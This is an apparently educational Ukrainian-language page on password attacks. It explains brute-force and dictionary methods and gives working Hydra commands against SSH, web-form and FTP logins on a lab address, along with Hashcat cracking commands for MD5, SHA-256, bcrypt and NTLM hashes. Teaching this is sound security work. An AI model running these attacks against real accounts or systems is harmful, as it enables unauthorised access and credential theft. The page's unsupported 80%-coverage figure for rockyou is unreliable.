📖
Password Attacks
Brute-force, dictionary attacks and credential stuffing concepts.
Типи атак на паролі
1. Brute Force — перебір усіх комбінацій
Надійно, але повільно. Для коротких паролів або PIN-кодів.
2. Dictionary Attack (словникова) — перебір зі списку
Найефективніший для реальних паролів. Списки слів (wordlists):
/usr/share/wordlists/rockyou.txt— 14M паролів з витоків- SecLists (github.com/danielmiessler/SecLists) — велика колекція
3. Rule-based — модифікація словника
Правила замінюють символи: password → P@ssw0rd, Password123
4. Rainbow Tables
Попередньо обчислені хеші → миттєвий злам, але великий розмір файлів.
Hydra — онлайн brute force
bash
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.101
# HTTP форма (POST)
hydra -l admin -P rockyou.txt 192.168.56.101 http-post-form \
"/login:username=^USER^&password=^PASS^:Invalid credentials"
# FTP
hydra -L users.txt -P passwords.txt ftp://192.168.56.101
# Параметри
# -l один логін
# -L файл з логінами
# -p один пароль
# -P wordlist
# -t потоки (default 16)
# -V verbose
# -f зупинитись після першого успіхуHashcat — злам хешів офлайн
bash
# Ідентифікація хешу
hashcat --identify hash.txt
hash-identifier
# MD5
hashcat -m 0 hashes.txt rockyou.txt
# SHA-256
hashcat -m 1400 hashes.txt rockyou.txt
# bcrypt (повільно, але надійно)
hashcat -m 3200 hashes.txt rockyou.txt
# NTLM (Windows)
hashcat -m 1000 hashes.txt rockyou.txt
# Rules для кращого покриття
hashcat -m 0 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.ruleОнлайн-злам хешів:
- crackstation.net — великі rainbow tables
- hashes.com — спільнота злому хешів
rockyou.txt має 14.3 мільйони паролів — покриває ~80% реальних паролів середнього користувача. Для кращих результатів поєднуй словник з правилами (rules): `hashcat -r best64.rule` виробляє 65 варіантів кожного слова (Capitalized, с1фрами, тощо).